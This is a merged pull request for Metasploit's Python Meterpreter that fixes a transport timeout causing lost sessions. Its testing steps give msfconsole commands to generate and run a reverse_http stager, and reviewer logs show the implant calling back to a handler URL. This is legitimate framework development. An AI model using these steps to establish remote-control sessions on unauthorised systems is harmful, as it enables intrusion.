### PR TITLE
Fix the HTTP transport comm timeout

### PR DESCRIPTION
**Pull request by zeroSteiner**
This fixes rapid7/metasploit-framework#15098 which is an issue in the Python Meterpreter's HTTP transport code. The gist is that Metasploit's HTTP server will respond with a 200 OK and an empty body when there are not Meterpreter requests that need to be dispatched to the agent. This is the expected behavior and not an error condition as can be seen in the Windows Meterpreter's HTTP transport [code](https://github.com/rapid7/metasploit-payloads/blob/060feece01e9b7479ae4e1579ba827cd6804c4d6/c/meterpreter/source/metsrv/server_transport_winhttp.c#L397-L399).

The problem is that Python wasn't differentiating an empty response from an error condition. This lead to changing the transport and then losing control. When a 200 OK comes back with an empty body now the communication timeout is updated since everything is communicating normally. This prevents the communication breakdown.

## Testing Steps

- [ ] Install the updated file
    * The easiest way is probably to symlink the `meterpreter.py` file into `$HOME/.msf4/payloads/meterpreter/meterpreter.py`
- [ ] Start msfconsole
- [ ] Run: `use payload/python/meterpreter/reverse_http`
    - [ ] Set some options that make it easier to see what's going on: `set MeterpreterTryToFork false` and `set PythonMeterpreterDebug true`
- [ ] Run: `to_handler` to start the handler
- [ ] Run: `generate -f raw` to generate the Python stager
- [ ] Run the Python stager using Python to establish a session and make sure it's responsive, run `sysinfo` the basics to see it's all good
- [ ] Wait 10 minutes
- [ ] Check that the session is still responsive, run `sysinfo`, `getuid` etc.

Without this patch after waiting 10 minutes, there would be a log message in the debug output that the transport was changing (since it thought there were was an error in the communication) at which point the session would be defunct.

### CODE REVIEW

**Comment by timwr** [comment]
Looks good to me:
Before fix:
```
meterpreter > localtime
Local Date/Time: 2021-04-30 16:44:02 EDT (UTC-500)
meterpreter >
meterpreter > localtime
[-] Error running command localtime: Rex::TimeoutError Operation timed out.

Python side:
[*] sending response packet
[*] running method stdapi_sys_config_localtime
[*] sending response packet
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
Traceback (most recent call last):
  File "<string>", line 897, in get_packet
  File "<string>", line 889, in decrypt_packet
  File "<string>", line 1651, in met_aes_decrypt
  File "met_aes", line 45, in __init__
TypeError: object of type 'NoneType' has no len()
...
```

After fix:
```
meterpreter > localtime
Local Date/Time: 2021-04-30 16:57:55 EDT (UTC-500)
meterpreter > localtime
Local Date/Time: 2021-04-30 17:08:11 EDT (UTC-500)

[*] sending response packet
[*] running method stdapi_sys_config_localtime
[*] sending response packet
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
Traceback (most recent call last):
  File "<string>", line 897, in get_packet
  File "<string>", line 889, in decrypt_packet
  File "<string>", line 1651, in met_aes_decrypt
  File "met_aes", line 45, in __init__
TypeError: object of type 'NoneType' has no len()
```

**Comment by zeroSteiner** [comment]
Your after-fix text still looks like a problem though? You shouldn't be getting the "changing transport to" message at all since it should never timeout. Was it still responsive after that?

**Comment by timwr** [comment]
Oops pasted the wrong thing in After:
Let me try that again

**Comment by timwr** [comment]
Looks good to me:
Before fix:
```
meterpreter > localtime
Local Date/Time: 2021-04-30 16:44:02 EDT (UTC-500)
meterpreter >
meterpreter > localtime
[-] Error running command localtime: Rex::TimeoutError Operation timed out.

Python side:
[*] sending response packet
[*] running method stdapi_sys_config_localtime
[*] sending response packet
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
[*] changing transport to: http://192.168.13.37:4444/EEI6wP72f1DLrt66qyKgkAVVmZsNus6Kt_4zAeRR/
Traceback (most recent call last):
  File "<string>", line 897, in get_packet
  File "<string>", line 889, in decrypt_packet
  File "<string>", line 1651, in met_aes_decrypt
  File "met_aes", line 45, in __init__
TypeError: object of type 'NoneType' has no len()
...
```

After fix:
```
meterpreter > localtime
Local Date/Time: 2021-04-30 16:57:55 EDT (UTC-500)
meterpreter > localtime
Local Date/Time: 2021-04-30 17:08:11 EDT (UTC-500)


[*] running method stdapi_sys_config_localtime
[*] sending response packet
[*] running method stdapi_sys_config_localtime
[*] sending response packet
[*] running method core_shutdown
[*] sending response packet
```

**Comment by zeroSteiner** [comment]
Phew, thanks alot! That's what I was hoping for. I was worried there was still something I wasn't aware of.

**Pull request merged**
